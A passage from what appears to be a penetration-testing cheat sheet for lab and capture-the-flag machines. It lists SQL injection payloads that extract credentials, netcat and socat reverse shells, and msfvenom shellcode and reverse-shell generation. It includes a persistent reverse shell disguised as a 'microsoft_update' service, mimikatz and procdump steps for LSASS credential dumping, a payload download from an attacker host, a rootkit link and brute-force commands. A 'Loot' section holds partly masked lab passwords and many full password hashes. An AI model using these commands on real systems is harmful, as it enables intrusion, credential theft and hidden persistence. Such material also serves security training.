table: http://<targetip>/inj.php?id=1 union all select 1,2,3,column_name,5 from information_schema.columns where table_name='users' concat user names and passwords: http://<targetip>/inj.php?id=1 union all select 1,2,3,concat(name, 0x3a , password),5 from users write to a file: http://<targetip>/inj.php?id=1 union all select 1,2,3,"content",5 into outfile 'outfile' ``` ### startup scripts [🡑](#tips) ``` chmod +x /foo/bar update-rc.d /foo/bar defaults ``` ### stegnography [🡑](#tips) ``` strings exiftool steghide ``` ### tmux shortcuts [🡑](#tips) ``` prefix: ctrl + b toggle logging: prefix + shift + p screen cap: prefix + alt + p complete history: prefix + alt + shift + p ``` ### tunneling [🡑](#tips) ``` connect via squid proxy @ 3128/tcp on <targetip>, redirect to ssh service on localhost, run a local standalone daemon on <targetport>: proxytunnel -p <targetip>:<targetport> -d 127.0.0.1:22 -a 1234 ssh [email protected] /bin/bash vim /etc/proxychains.conf http <targetip> <targetport> proxychains nmap -sT -p22 <targetip> proxychains ssh <username>@<targetip> /bin/bash forward remote port to local address: plink.exe -P 22 -l root -pw "<password>" -R 445:127.0.0.1:445 <targetip> ``` ### windows useful commands [🡑](#tips) ``` net localgroup Users net localgroup Administrators search dir/s *.doc system("start cmd.exe /k $cmd") sc create microsoft_update binpath="cmd /K start c:\nc.exe -d <targetip> <targetport> -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv <targetip> <targetport> mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp ## for 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp ## for 64 bits bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerip>/payload.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\payload.exe powershell history: type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` <a name="tools"></a> ## 💥 Tools [↟](#contents) ### burp [🡑](#tools) ``` set an upstream proxy within burp: burp > user options > upstream proxy > <targetip>:<targetport> ``` ### cewl [🡑](#tools) ``` cewl www.megacorpone.com -m 6 -w /root/newfilelist.txt 2>/dev/null ``` ### fcrackzip [🡑](#tools) ``` fcrackzip -uDp /usr/share/wordlists/rockyou.txt <file.zip> unzip -o -P "password" <file.zip> ``` ### gobuster [🡑](#tools) ``` start with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt wordlist search file extension: gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x txt,php gobuster dir -u http://<targetip>:<targetport>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" quick: gobuster -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux full/comprehensive: gobuster -s 200,204,301,302,307,403 -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' ippsec: gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,403 -k -x txt,php,asp gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl cgi list: /usr/share/seclists/Discovery/Web-Content/CGIs.txt ``` ### hashcat [🡑](#tools) ``` hashcat -a 0 -m 0 <hash> /usr/share/wordlists/rockyou.txt ``` ### hydra [🡑](#tools) ``` generic: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> ftp: hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ftp http: hydra -l admin -P /root/ctf_wordlist.txt kioptrix3.com http-post-form "/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username and password to continue'" -V with cookie: hydra -l user -P /usr/share/wordlists/rockyou.txt <targetip> -V http-get '/dir/page.php?name=^USER^&pass=^PASS^&submit=Log In:F=Incorrect:H=Cookie: insert stuff here' pop3: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> pop3 rdp: hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://<targetip> smtp: hydra -s 25 -v -V -l [email protected] -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f <targetip> smtp ssh: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -p some_passsword <targetip> ssh wordpress: hydra -l elliot -P ./fsocity.dic <targetip> http-post-form "/wp-login.php:log=elliot&pwd=^PASS^:ERROR" ``` ### john [🡑](#tools) ``` create custom wordlist: john --wordlist=megacorpone-cewl --rules --stdout >megacorpone-cewl-jtr crack shadow hashes: unshadow passwd shadow >unshadowed ; john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed ; john --show unshadowed crack md5 hashes: john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes ``` ### kernel module [🡑](#tools) ``` rootkit: https://github.com/PinkP4nther/Pinkit ``` ### merlin c2 framework [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://<targetip>:<attackerport>" -o merlinagentx64.exe main.go go build -o merlinagent.elf main.go ``` ### metasploit [🡑](#tools) ``` db_status load mimiktaz msfconsole -q msfdb init msfdb start search <string> set payload windows/x86/meterpreter/reverse_tcp set verbose true show advanced show options show payloads show targets systemctl start postgresql systemctl status postgresql wdigest ``` ### msfvenom [🡑](#tools) ``` linux bind tcp shellcode: msfvenom -p linux/x86/shell_bind_tcp lport=4444 -f c -b "\x00\x0a\x0d\x20" --platform linux -a x86 -e x86/shikata_ga_nai windows reverse tcp shellcode: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -b "\x00\x0a\x0d" -f c -a x86 --platform windows -e x86/shikata_ga_nai revere tcp shellcode for client-side exploit without any encoder: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -f js_le --platform windows -a x86 -e generic/none php reverse meterpreter: msfvenom -p php/meterpreter/reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f raw -o shell.php php reverse shell: msfvenom -p php/reverse_php LHOST=<targetip> LPORT=80 -f raw -o reverse.php java war reverse shell: msfvenom -p java/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f war -o shell.war windows javascript reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f js_le -e generic/none -n 18 windows powershell reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 linux reverse tcp shell elf shared object file: msfvenom -p linux/x86/shell_reverse_tcp -f elf-so lhost=<targetip> lport=<attackerport> -o linux-shell-reverse-tcp.so ``` ### netcat [🡑](#tools) ``` bind: nc -lvp <attackerport> connect: nc -nv <targetip> <attackerport> reverse: nc -e /bin/bash <targetip> <attackerport> ``` ### ncrack [🡑](#tools) ``` bruteforce rdp login: ncrack -vv --user administrator -P passwords.txt rdp://<targetip> ``` ### netdiscover [🡑](#tools) ``` netdiscover -r 192.168.92.0/24 ``` ### nikto [🡑](#tools) ``` nikto -h http://<targetip> nikto -C all -h http://IP nikto -h <targetip> -useproxy http://<targetip>:3128 ``` ### nmap [🡑](#tools) ``` vulners nse script: https://github.com/vulnersCom/nmap-vulners searchsploit-like vuln scan: nmap --script vulners --script-args mincvss=5.0 <targetip> ping sweep: nmap -sn -oN scan.ping.nmap <targetiprange> ; cat scan.ping.nmap | grep Up | cut -d" " -f2 quick tcp: nmap -Pn -n -sC -sV -vv -oN scan.tcp.nmap <targetip> quick udp: nmap -Pn -n -sU -sV -vv -oN scan.udp.nmap <targetip> full/intensive tcp: nmap -Pn -n -sC -sV -p- -vv -oN scan.fulltcp.nmap <targetip> full/intensive udp: nmap -Pn -n -sU -sV -p- -vv -oN scan.fulltcp.nmap <targetip> smb bruteforce: nmap --script=smb-brute.nse <targetip> nmap -sV -p 445 --script smb-brute <targetiprange> ``` ### openssl [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 ## create a new x509 certificate valid for 7 days openssl req -new -key caca.key -out caca.csr ## create a new certificate signing request (csr) openssl x509 -req -days 365 -in caca.csr -signkey caca.key -out pipi.crt ## generate new certificate openssl pkcs12 -export -in pipi.crt -inkey caca.key -out pipi.p12 ## generate pkcs12 certificate ``` ### searchsploit [🡑](#tools) ``` nmap service scan output -> searchsploit: nmap -p- -sV -oX new.xml <attackerip>; searchsploit --nmap new.xml ``` ### socat [🡑](#tools) ``` socat file:`tty`,raw,echo=0 tcp-listen:<attackerport> socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attackerip>:<attackerport> ``` ### sqlmap [🡑](#tools) ``` avoid prompts, use defaults: sqlmap --batch read http request from a text file (request captured from burp, useful for POST requests) and use it to start scan: sqlmap -r searchform.txt --dbs --batch sqlmap -r searchform.txt -D webapphacking --dump-all --batch post requests: sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST intrusive scans: sqlmap --level 5 --risk 3 list databses: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --dbs list tables within a database: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery --tables dump a table: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T dev_accounts --dump blind sql enumeration: sqlmap -u "http://<targetip>:<targetport>/index.php" --forms --dbs ``` ### steghide [🡑](#tools) ``` steghide extract -sf file.jpg ``` ### unicornscan [🡑](#tools) ``` scan all 64k ports: unicornscan -vmT <targetip>:a scan first 1k ports: unicornscan -vmT <targetip>:p scan in udp mode: unicornscan -vmU <targetip> ``` ### wfuzz [🡑](#tools) ``` enumerate directories: wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://127.0.0.1/index.php?vuln=../FUZZ/file1.php" wfuzz -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --sc 200 -t 50 http://<targetip>:<targetport>/FUZZ wfuzz -w common.txt -w /usr/share/seclists/Discovery/Web-Content/web-mutations.txt --sc 200 -t 50 http://<targetip>:4488/FUZZ enumerate directories and filter on response length: wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ bruteforce password: bruteforce a single list: wfuzz -w pwds.db -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists: wfuzz -w pwds.db -w pins.txt -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists, but faster: wfuzz -c -z file,./usernames.txt -z file,./pwds.db -d 'user=FUZZ&pass=FUZ2Z&pin=12345' --hh 45 http://<targetip>:<targetport>/login.php wfuzz -c -z file,./pin.txt -d 'user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ' --hh 45,41 http://<targetip>:<targetport>/login.php ``` <a name="loot"></a> ## 🔥 Loot [↟](#contents) <a name="credentials"></a> ### 🔑 Credentials [🡑](#loot) | # | Username | Password | Type | |---|----------|----------|------| | 1. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ftp` | | 2. | `veronica` | `babygirl_veronica07@yah......` | `ftp` | | 3. | `eric` | `ericdoesntdrinkhiso.....` | `ftp` | | 4. | `Balrog` | `Mell..` | `ftp` | | 5. | `eezeepz` | `keKkeKKeKKeKkE....` | `http` | | 6. | `john` | `MyNameIsJ...` | `liggoat` | | 7. | `robert` | `ADGAdsafdfwt4gadf....` | `liggoat` | | 8. | `dreg` | `Mast..` | `lotuscms` | | 9. | `loneferret` | `starwa..` | `lotuscms` | | 10. | `admin` | `kEjdbRigfBHUREi....` | `mysql` | | 11. | `john` | `thiscannotb...` | `mysql` | | 12. | `wpdbuser` | `meErKa..` | `mysql` | | 13. | `mysql` | `mysql@12...` | `mysql` | | 14. | `admin` | `3298fj8323j80d....` | `mysql` | | 15. | `wordpress` | `Oscp1234..` | `mysql` | | 16. | `john` | `hiroshi..` | `mysql` | | 17. | `root` | `fuckey..` | `mysql` | | 18. | `Admin` | `TogieMYSQL123....` | `mysql` | | 19. | `root` | `darkshad..` | `mysql` | | 20. | `sql_svc` | `M3g4c0rp...` | `sql` | | 21. | `administrator` | `MEGACORP_4dm....` | `ssh` | | 22. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ssh` | | 23. | `pi` | `raspber..` | `ssh` | | 24. | `fox` | `12345..` | `ssh` | | 25. | `eric` | `triscui..` | `ssh` | | 26. | `anne` | `prince..` | `ssh` | | 27. | `graham` | `GSo7isUM...` | `ssh` | | 28. | `root` | `1234.` | `ssh` | | 29. | `admin` | `thisisalsopw...` | `ssh` | | 30. | `fristigod` | `LetThereBeFri....` | `ssh` | | 31. | `dreg` | `Mast..` | `ssh` | | 32. | `loneferret` | `starwa..` | `ssh` | | 33. | `john` | `MyNameIsJ...` | `ssh` | | 34. | `robert` | `ADGAdsafdfwt4gadf....` | `ssh` | | 35. | `togie` | `1234.` | `ssh` | | 36. | `bob` | `secr..` | `ssh` | | 37. | `susan` | `MySuperS3cretVa....` | `ssh` | | 38. | `insecurity` | `P@ssw0..` | `ssh` | | 39. | `smeagol` | `MyPreciousR...` | `ssh` | | 40. | `Ori` | `span..` | `ssh` | | 41. | `robot` | `abcdefghijklmnopqrstu.....` | `ssh` | | 42. | `mark` | `5AYRft73VtFp....` | `ssh` | | 43. | `wpadmin` | `wpadm..` | `ssh` | | 44. | `root` | `rootpasswo...` | `ssh` | | 45. | `user` | `letme..` | `ssh` | | 46. | `tomcat` | `submitthisforpo....` | `tomcat` | | 47. | | `execrab..` | `truecrypt` | | 48. | `rascal` | `lov.` | `webapp` | | 49. | `user1` | `hell.` | `webapp` | | 50. | `user2` | `comman..` | `webapp` | | 51. | `user3` | `p@ssw0..` | `webapp` | | 52. | `test` | `testte..` | `webapp` | | 53. | `superadmin` | `Uncracka...` | `webapp` | | 54. | `test1` | `testte..` | `webapp` | | 55. | `admin` | `5afac8d8..` | `webapp` | | 56. | `john` | `66lajGGb..` | `webapp` | | 57. | `frodo` | `iwilltakethe....` | `webapp` | | 58. | `smeagol` | `MyPreciousR...` | `webapp` | | 59. | `aragorn` | `AndMySwo..` | `webapp` | | 60. | `legolas` | `AndMyB..` | `webapp` | | 61. | `gimli` | `AndMyA..` | `webapp` | | 62. | `myP14ceAdm1nAcc0uNT` | `manchest..` | `webapp` | | 63. | `tom` | `spongeb..` | `webapp` | | 64. | `mark` | `snowfla..` | `webapp` | | 65. | `john` | `enig..` | `wordpress` | | 66. | `mark` | `helpdesk..` | `wordpress` | | 67. | | `admin:$P$Bx9ohXoCVR5lkKtuQbuWuh2........` | `wordpress` | | 68. | `admin` | `TogieMYSQL123....` | `wordpress` | | 69. | `elliot` | `ER28-06..` | `wordpress` | | 70. | `admin` | `admi.` | `wordpress` | <a name="hashes"></a> ### 🔑 Hashes [🡑](#loot) | # | Hash | |---|------| | 1. | `abatchy:$6$xEq/159Q$ScuKnynbwTBdFA4B9w6OqKxQpWPGpofi59McVuP6T1SADKhNy4n33Ovkk0hwZQkx72XriPSIrc2ubr16OEBBn0:17238:0:99999:7:::` | | 2. | `admin:$6$NPXhvENr$yG4a5RpaLpL5UDRRZ3Ts0eZadZfFFbYpI1kyNJp9rND0AySx2FhYSmAvY.91UzETJVvZcDjWb2pp85uLAli2J/:16757:0:99999:7:::` | | 3. | `Administrator:500:0a70918d669baeb307012642393148ab:34dec8a1db14cdde2a21967c3c997548:::` | | 4. | `Administrator:500:c74761604a24f0dfd0a9ba2c30e462cf:d6908f022af0373e9e21b8a241c86dca:::` | | 5. | `anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::` | | 6. | `anne:$6$ChsjoKyY$1uHlk7QUSOmdpvSP7Q4PYmE3evwQbUPFp27I4ZdRx/pZp8C8gJAQGu2vy8kwLakYA7cWuZ40aOl2u.8J94U7V.:17595:0:99999:7:::` | | 7. | `arrexel:$1$mDpVXKQV$o6HkBjhl/e.S.bV96tMm6.:17504:0:99999:7:::` | | 8. | `ASPNET:1007:3f71d62ec68a06a39721cb3f54f04a3b:edc0d5506804653f58964a2376bbd769:::` | | 9. | `Balrog:$6$J6kuCfxq$L5ALsHRYfOu0bVV9MbW3.VZOUVEaKSWhfPIq5wXUFV407tpvH8Zx7WdbJeXgdWoPo9LU8eIznf0d44qoFAMn3.:17284:0:99999:7:::` | | 10. | `billy:$6$eqJNxIDh$oO.ynkHZmLxfr0k8YXHHdbyB4boe2two4HnEiJzzuVEUh0w0paEtVCmHXziHhZIet71QcLqhqnV/iknE/pXdS1:17035:0:99999:7:::` | | 11. | `bitnamiftp:$6$saPiFTAH$7K09sg5oIfkIs5kuMx1R/Um4HNd8O6vF2n8oICEom8VVer0BYATY5wtzdPdP3JeuKbZ4RYBml0THNQv8TSc0s/:16751:0:99999:7:::` | | 12. | `bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::` | | 13. | `brexit:$6$51s7qYVw$XbTfXEV2acHRp9vmA7VTxO35OLK9EGZJzDGF9nYaukD3eppHsn2P1ESMr.9rRn/YYO70uiUskfkWP0LyRtTiT1:18048:0:99999:7:::` | | 14. | `crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::` | | 15. | `doomguy:$6$DWqgg./v$NxqnujIjE8RI.y1u/xiFBPC0K/essEGOfxSF7ovfHG46K6pnetHZNON3sp19rGuoqo26wQkA4B2znRvhqCGQ11:17594:0:99999:7:::` | | 16. | `dreg:$1$qAc2saWZ$Y567sEs.ql3GMttI6pvoe0:15080:0:99999:7:::` | | 17. | `eezeepz:$6$djF4bN.s$JWhT7wJo37fgtuJ.be2Q62PnM/AogXuqGa.PgRzrMGv9/Th0aixBXl8Usy9.RkO1ZRAQ/UM3xP7oGWu9zgEIl.:16756:0:99999:7:::` | | 18. | `eric:$6$b15/PaMU$VKQussKbrXty79HD4A989SVCn.7.u6bJLMvsFgDSgiM01GlyM/lhb1xF0RcX906O6aIMbP7XoVI2F5UzII72i.:17033:0:99999:7:::` | | 19. | `fristigod:$6$0WqnZlI/$gIzMByP7rH21W3neA.uHYZZg5aM7gI1xtOj8WwgoK1QgQh2LWL0nQBJau/mGcOSxLbaGJhJjM.6HNJTWsaetf0:16758:0:99999:7:::` | | 20. | `graham:$6$WF7GkVxM$MOL.cXLpG6UTO0M4exCUFwOEiUhW6bwQa.Frg9CerQbTp.EW4QTzEAuio26Aylv.YP0JPAan10tsUFv6kyvRN0:18010:0:99999:7:::` | | 21. | `Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::` | | 22. | `hackme:$6$.L285vCy$Hma4mKjGV.sE7ZCFVj2iOkRokX1u3F5DMiTPQFoZPJnQ1kUXLje/bY2BIUQFbYu.8M6BvLML5fAftZOCEVnqa1:17981:0:99999:7:::` | | 23. | `harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::` | | 24. | `harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::` | | 25. | `Harry:1008:93c50499355883d1441208923e8628e6:031f5563e0ac4ba538e8ea325479740d:::` | | 26. | `IUSR_GRANPA:1003:a274b4532c9ca5cdf684351fab962e86:6a981cb5e038b2d8b713743a50d89c88:::` | | 27. | `IWAM_GRANPA:1004:95d112c4da2348b599183ac6b1d67840:a97f39734c21b3f6155ded7821d04d16:::` | | 28. | `jens:$6$JWiFWXb8$cGQi07IUqln/uLLVmmrU9VLg7apOH9IlxoyndELCGjLenxfAaVec5Gjaw2DA0QHRwS9hTB5cI2sg/Wk1OFoAh/:18011:0:99999:7:::` | | 29. | `john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::` | | 30. | `john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::` | | 31. | `john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::` | | 32. | `john:$6$aoN7zaDl$e6RsRZndFekSS4bgqz0y5dgzO1dTQsMAWck6dFGogkxrrZf1ZyGbjy/oCpqJniIkasXP05iFZHs.XZVIQqZ2w1:17594:0:99999:7:::` | | 33. | `klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::` | | 34. | `Lakis:1009:f927b0679b3cc0e192410d9b0b40873c:3064b6fc432033870c6730228af7867c:::` | | 35. | `loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::` | | 36. | `loneferret:$1$qbkHf53U$r.kK/JgDLDcXGRC6xUfB11:15079:0:99999:7:::` | | 37. | `mai:$6$Mp.mBBi7$BCAKb75xSAy8PM6IhjdSOIlcmHvA9V4KnEDSTZAN2QdMUwCwGiwZtwGPXalF15xT097Q6zaXrY6nD/7RsdSiE0:17594:0:99999:7:::` | | 38. | `makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::` | | 39. | `mark:$6$//1vISW6$9pl2v8Jg0mNE7E2mgTQlTwZ1zcaepnDyYE4lIPJDdX7ipnxm/muPD7DraEm3z0jqDe5iH/Em2i6YXJpQD.5pl0:18010:0:99999:7:::` | | 40. | `mark:$6$J3gYK/cQ$au1WmOCtq.X1DTKt1CEmKA9qr4PfwZuAGUdCfAV.SSU5VxAtjW/Xk1/oWJtQVaoXMEVXmeBIB6bq24JpcSRjF0:17408:0:99999:7:::` | | 41. | `mysql:$6$O2ymBAYF$NZDtY392guzYrveKnoISea6oQpv87OpEjEef5KkEUqvtOAjZ2i1UPbkrfmrHG/IonKdnYEec0S0ZBcQFZ.sno/:18053:0:99999:7:::` | | 42. | `notch:$6$RdxVAN/.$DFugS5p/G9hTNY9htDWVGKte9n9r/nYYL.wVdAHfiHpnyN9dNftf5Nt.DkjrUs0PlYNcYZWhh0Vhl/5tl8WBG1:17349:0:99999:7:::` | | 43. | `noulis:$6$ApsLg5.I$Zd9blHPGRHAQOab94HKuQFtJ8m7ob8MFnX6WIIr0Aah6pW/aZ.yA3T1iU13lCSixrh6NG1.GHPl.QbjHSZmg7/:17247:0:99999:7:::` | | 44. | `Ori:$6$1zYgjEIM$VQ0gvU7JjenS9WuiVjSeva8pbWnEXjqTmEdFnQRXKmTmXPXmt55/oyup40NiXD8J9GxmXF7DYiaHZDRshrs3f1:17237:0:99999:7:::` | | 45. | `oscp:$6$k8OEgwaFdUqpVETQ$sKlBojI3IYunw8wEDAyoFdHgVtOPzkDPqksql7IWzpfZXpd3UqP569BokTZ52mDroq/rmJY9zgfeQVmBFu/Sf.:18452:0:99999:7:::` | | 46. | `peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::` | | 47. | `pi:$6$SQPHFoql$gSE5qWbZRGHDin4LnFY56sMnQsmvH/o2oIlXv.3KcqVsJCYgJ09R9/Pws88e8yjKgJnaxN3zdq8f5ots1bJcY/:17148:0:99999:7:::` | | 48. | `postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::` | | 49. | `puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::` | | 50. | `reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::` | | 51. | `robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::` | | 52. | `robot:$6$HmQCDKcM$mcINMrQFa0Qm7XaUaS5xLEBSeP3bUkr18iwgwTAL8AIfUDYBWG5L8J9.Ukb3gVWUQoYam4G0m.I5qaHBnTddK/:16752:0:99999:7:::` | | 53. | `root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::` | | 54. | `root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh` | | 55. | `root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::` | | 56. | `root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::` | | 57. | `root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::` | | 58. | `root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::` | | 59. | `root:$6$.wvqHr9ixq/hDW8t$a/dHKimULfr5rJTDlS7uoUanuJB2YUUkh.LWSKF7kTNp4aL8UTlOk2wT8IkAgJ.vDF/ThSIOegsuclEgm9QfT1:18452:0:99999:7:::` | | 60. | `root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7:::` | | 61. | `root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::` | | 62. | `root:$6$BVgS5ne0$Q6rV3guK7QQUy7uRMwbQ3vv2Y5I9yQUhIzvrIhuiDso/o5UfDxZw7MMq8atR3UdJjhpkFVxVD0cVtjXQdPUAH.:17431:0:99999:7:::` | | 63. | `root:$6$CM3c1cdI$HbQWZlQdGEWV8yo3j7M84i1/RFK4G7fafTUIUYLWk52zm9O8KRLhqZenF8KbqsUjHlZQk4VmNEeEbBCRjOWbH0:17111:0:99999:7:::` | | 64. | `root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::` | | 65. | `root:$6$GpmQGQUN$8kLewzMF4ItmxezcryWqSPrXNRTH5TOQFKKkHjK2NSmrTg95xiYi.l8L.RYUL.8pAsj8s4EGvDy4dvENQIqNf.:15585:0:99999:7:::` | | 66. | `root:$6$kdMFceEg$pk9h93tdD7IomhE7L0Y396HO6fxSM.XDh9dgeBhKpdZlM/WYxCZe7yPRNHfZ5FvNRuILVp2NOsqNmgjoSx/IN0:18012:0:99999:7:::` | | 67. | `root:$6$L2m6DJwN$p/xas4tCNp19sda4q2ZzGC82Ix7GiEb7xvCbzWCsFHs/eR82G4/YOnni/.L69tpCkOGo5lm0AU7zh9lP5fL6A0:17247:0:99999:7:::` | | 68. | `root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::` | | 69. | `root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::` | | 70. | `root:$6$n.BA4A59$WeIF0ZbaB3VGgAxUZqGHnw01.GhL9oVYYFioh07RpPtBl49YdMahhtbYhxUjanXf/NJXiCHBvrNhdC53P1UX2.:17412:0:99999:7:::` | | 71. | `root:$6$O4bZf1Ju$0xcLPNyQkVcKT0CajZYBOTz4thlujMRjQ7XuFstUDWwYHKmVmJsDmzGXUwYbU1uqr6jxEvX4XJjSUgiwjPmEp0:17399:0:99999:7:::` | | 72. | `root:$6$P7ElNgGp$fNzyy4OgqSR1ANJXTgbpzp4U42JXG1qJ55iNV10NVJoX5UWjtckWD0oHmcTOj0lqObyWhFu2y3udHVpHaqYxf.:17238:0:99999:7:::` | | 73. | `root:$6$PnbVvEMS$OcseJT8lZRrgrW1JBpHJ252SPRxS6Rkh3oVBkrbRBZgHBD1wArL6FcyO5daqaon7waFKwSqbg5fIjFgzUVFMS1:18048:0:99999:7:::` | | 74. | 